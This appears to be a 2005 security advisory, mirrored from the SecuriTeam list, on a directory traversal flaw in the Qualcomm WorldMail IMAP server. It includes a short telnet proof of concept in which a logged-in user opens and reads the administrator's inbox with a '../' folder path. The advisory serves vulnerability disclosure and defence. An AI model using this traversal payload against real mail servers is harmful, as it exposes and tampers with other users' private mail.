The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[NT] Qualcomm WorldMail IMAP Server Directory Traversal


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 21 Nov 2005 16:28:58 +0200
Subject: [NT] Qualcomm WorldMail IMAP Server Directory Traversal
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20051121162502.9A3205804@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  Qualcomm WorldMail IMAP Server Directory Traversal
------------------------------------------------------------------------


SUMMARY

" <http://www.eudora.com/worldmail/>; Qualcomm WorldMail is an email and 
messaging server designed for use in small to large enterprises that 
supports IMAP, POP3, SMTP, and web mail features."

Exploitation of a directory transversal vulnerability in Qualcomm 
WorldMail IMAP Server allows attackers to read any email stored on the 
system.

DETAILS

Vulnerable Systems:
 * Qualcomm Worldmail server version 3.0

The IMAP protocol support the use of multiple folders and contain commands 
for authenticated users that can specify specific paths. Qualcomm 
WorldMail server allow multiple commands to specify folders outside of the 
current user's mailbox.

Attackers can leverage this vulnerability to view and manage any other 
user's email messages stored on the system. Attackers can also have the 
ability to move any arbitrary folder on the system.

Exploitation is trivial and can be done with a simple telnet client.
Proof of Concept:
c:\> telnet 192.168.0.109 143

* OK WorldMail IMAP4 Server 6.1.19.0 ready
1 login user1 user1
1 OK LOGIN completed


2 select /inbox
* 0 EXISTS
* OK [UNSEEN 0]
2 OK [READ-WRITE] opened /inbox

2 select ./../../administrator/inbox
* 1 EXISTS
* OK [UNSEEN 1] Message 1 is first unseen
2 OK [READ-WRITE] opened ./../../administrator/inbox

2 fetch 1 (RFC822.TEXT)
* 1 FETCH (RFC822.TEXT {131}

this message was sent to administrator

Successful exploitation of this vulnerability allow attackers to view and 
delete mail from any user on the system. Attackers may also be able to 
affect system stability with the ability to move arbitrary folders on the 
affected system.

In order to exploit this vulnerability an attacker would need a valid 
login to the email server and the IMAP module would have to be enabled 
(default).

Workaround:
Disable the IMAP protocol and use the POP protocol instead.

Vendor Status:
Multiple attempts have been made to inform the vendor of this 
vulnerability but to date a response has not yet been received.

CVE Information:
 <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3189>; 
CAN-2005-3189

Disclosure Timeline:
10/12/2005 - Initial vendor notification
10/27/2005 - Initial vendor response
11/17/2005 - Public disclosure


ADDITIONAL INFORMATION

The information has been provided by  
<mailto:idlabs-advisories@lists.idefense.com.> iDEFENSE .
The original article can be found at:  
<http://www.idefense.com/application/poi/display?id=341&type=vulnerabilities>; http://www.idefense.com/application/poi/display?id=341&type=vulnerabilities




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру